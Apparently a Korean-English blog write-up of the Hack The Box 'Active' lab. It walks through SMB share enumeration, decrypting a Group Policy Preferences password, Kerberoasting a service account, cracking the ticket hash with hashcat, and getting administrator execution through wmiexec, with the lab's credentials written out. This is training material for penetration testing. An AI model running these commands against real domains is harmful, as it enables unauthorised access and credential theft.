How many SMB shares are shared by the target?
Nmap scan report for app.htb (10.129.45.168)
Host is up (0.19s latency).
Not shown: 983 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-21 07:40:23Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open tcpwrapped
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
49158/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-01-21T07:41:21
|_ start_date: 2026-01-21T07:23:56
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 430.33 seconds
smbclient -L 10.129.45.168 -N

What is the name of the share that allows anonymous read access?
smbmap -H app.htb

Which file has encrypted account credentials in it?
Download all data using smbclient smbclient 사용하여 모든 데이터 다운로드
smbclient //app.htb/Replication#smbrecurse onprompt offmget **

Password hash found in Groups.xml file downloaded 다운받은 파일에서 Groups.xml 발견한 password hash

What is the decrpyted password for the SVC_TGS account?
Policies에서 찾은 groups.xml은 GPP를 통해 저장할 때 AES-256으로 암호화 groups.xml found in Policies is encrypted with AES-256 when saved via GPP
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

Submit the flag located on the security user’s desktop.
smbmap -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 -H app.htb


smbclient -U SVC_TGS%GPPstillStandingStrong2k18 //app.htb/Users#clientget user.txt



Which service account on Active is vulnerable to Kerberoasting?
#활성화된 관리자 계정 식별ldapsearch -x -H 'ldap://app.htb' -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b "dc=active,dc=htb" -s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2)))" samaccountname | grep sAMAccountName

python3 GetADUsers.py -all active.htb/svc_tgs -dc-ip app.htb

Kerberoasting
ldapsearch -x -H 'ldap://app.htb' -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b "dc=active,dc=htb" -s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2))(serviceprincipalname=*/*))" serviceprincipalname | grep -B 1 servicePrincipalName

python3 GetUserSPNs.py active.htb/svc_tgs -dc-ip app.htb

administrator 해시값 추출
python3 GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip app.htb -request

hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt --force --potfile-disable

impacket-wmiexec 'active.htb/administrator:Ticketmaster1968@10.129.46.170'

반응형
'IT > HTB' 카테고리의 다른 글
| Hack The Box - Nibbles Writeup (0) | 2026.02.09 |
|---|